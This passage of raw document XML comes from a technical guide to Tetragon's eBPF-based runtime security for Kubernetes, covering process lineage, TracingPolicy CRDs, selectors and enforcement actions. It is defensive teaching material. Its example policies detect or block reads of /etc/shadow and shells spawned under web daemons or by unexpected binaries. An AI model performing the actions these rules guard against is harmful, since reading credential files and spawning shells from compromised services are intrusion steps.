        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Maintaining real-time process lineage is non-trivial:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.4.1 Process Creation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon hooks execve and clone syscalls. On each fork/exec, a new process is born; Tetragon records its parent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.4.2 Process Exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon hooks process exit. When a process dies, its entry can eventually be garbage-collected (with some delay — children processes might still reference it in their ancestry).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.4.3 Namespace Awareness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PIDs are PER-NAMESPACE. Container PID 1 might be host PID 12345. Tetragon tracks both and maps between them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.4.4 Containerd / CRI Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To map processes to Kubernetes pods, Tetragon reads container runtime metadata. When a new container starts, the agent learns its PID → pod mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.4.5 Persistence in BPF Maps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The process lineage database lives in BPF maps — eBPF programs can reference it in-kernel. When a security-relevant syscall fires, the eBPF program looks up the process's lineage immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 Ancestry-Based Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With lineage as a primary, policies can reference ancestry directly. Example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Pseudocode for a policy that matches:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># "Any shell spawned where ANY ancestor is a network daemon"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matcher:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  binary: /bin/bash OR /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ancestry_contains: nginx OR apache OR httpd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This catches: network daemon compromised → attacker runs code → code spawns shell. The shell's ancestry includes the daemon. Direct lineage matching catches a broad attack pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Falco can do this too but requires more elaborate conditions. Tetragon's ancestry-first design makes such rules natural.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6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TracingPolicy: The Rule CRD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Kubernetes-Native Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's rules are Kubernetes CRDs — custom resources you apply with kubectl. This is a major philosophical difference from Falco's YAML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Falco YAML rules</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Tetragon TracingPolicy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Distribution</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Files in /etc/falco/</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CRDs in cluster</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Version control</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Git as files</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Git as CRDs or via GitOps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Applied via</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ConfigMaps / file deploys</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kubectl apply</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Scope</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Global to Falco instance</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Global OR namespace-scoped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Runtime update</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Reload required</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CRD change auto-reloads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Tooling</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Falco-specific</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Standard Kubernetes tooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 TracingPolicy vs. TracingPolicyNamespaced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two CRDs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TracingPolicy — cluster-wide. Applies across all namespaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TracingPolicyNamespaced — namespace-scoped. Applies only to pods in a specific namespace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cluster-wide policies are for foundational rules — "no one should write to /etc." Namespace-scoped policies are for context-specific rules — "in the payments namespace, only specific processes can read certain files."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Anatomy of a TracingPolicy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A simple TracingPolicy:</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watch-etc-shadow-reads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"security_file_open"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    syscall: false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return: false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"Equal"</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"/etc/shadow"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This policy hooks the security_file_open LSM function. Whenever ANY process opens /etc/shadow, an event is emitted. No enforcement — just observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 Key Sections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.4.1 kprobes / tracepoints / uprobes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policies can use different kernel hook types:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kprobes — kernel function entry/exit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tracepoints — stable kernel tracepoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">uprobes — userspace binary functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Choose based on the signal you want. For file operations, security_file_open is a standard LSM function. For syscalls, tracepoints are stable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.4.2 args</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Declares the arguments you're interested in. Tetragon can extract typed arguments from syscalls/functions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">int, size_t — numeric arguments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">char_buf, string — strings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">file — file struct (extracts path, inode, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sock — socket struct (extracts addresses, ports).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">skb — network packet buffer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.4.3 selectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The heart of a policy. Selectors define WHEN the policy matches — which argument values trigger the rule. Matches can be:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">matchArgs — argument value matching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">matchPIDs — PID range matching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">matchNamespaces — namespace matching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">matchBinaries — binary name matching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">matchCapabilities — capability set matching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">matchCapabilityChanges — capability changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">matchNamespaceChanges — namespace changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Multiple selectors combine with AND. Different types of matches let you build precise policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.4.4 matchActions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optional. Declares what to DO when the rule matches. Actions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post — emit event (default).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Override — change the syscall return value (e.g., return EPERM for "permission denied").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FollowFD — track the file descriptor for subsequent events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UnfollowFD — stop tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CopyFD — replicate a file descriptor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Signal — send a signal (e.g., SIGKILL to terminate the process).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NoPost — don't emit an event (for filtering).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Override and Signal actions are how ENFORCEMENT happens. Without these, policies are observation-only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.5 A Policy With Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extending the example to actually BLOCK reads of /etc/shadow:</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block-etc-shadow-reads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"security_file_open"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    syscall: false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"Equal"</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"/etc/shadow"</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     # EPERM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The added matchActions with Override action causes the open to FAIL. The process receives EPERM (permission denied) as if the file were inaccessible. The attacker never reads the file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.6 Binary-Specific Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policies can restrict matching to specific binaries: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"sys_execve"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    syscall: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"string"</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"/usr/bin/expected-tool"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        - "/usr/bin/trusted-agent"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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"Prefix"</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"/bin/sh"</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      # SIGKILL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This says: if any binary OTHER than expected-tool or trusted-agent calls execve with /bin/sh..., KILL THE PROCESS (SIGKILL). Protecting against unauthorized shell execution.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7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel Hooks Tetragon Uses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 The Hook Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon can attach to several kinds of kernel hooks, each with different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 type</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observes</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Enforcement?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Stable kernel event points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 (observability only)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Arbitrary kernel function entry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Limited (via override)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Kretprobes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function return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Uprobes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Userspace function entry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Linux Security Module hooks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 true enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Tracepoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stable kernel event points. Kernel developers guarantee these won't change between versions. Examples:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sched/sched_process_exec — process exec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sched/sched_process_exit — process exit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">syscalls/sys_enter_openat — syscall entry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">syscalls/sys_exit_openat — syscall exit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Good for observability across kernel versions. Stable; don't break on kernel upgrades.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 Kprobes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kprobes attach to ANY kernel function — even internal ones. More flexibility but:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
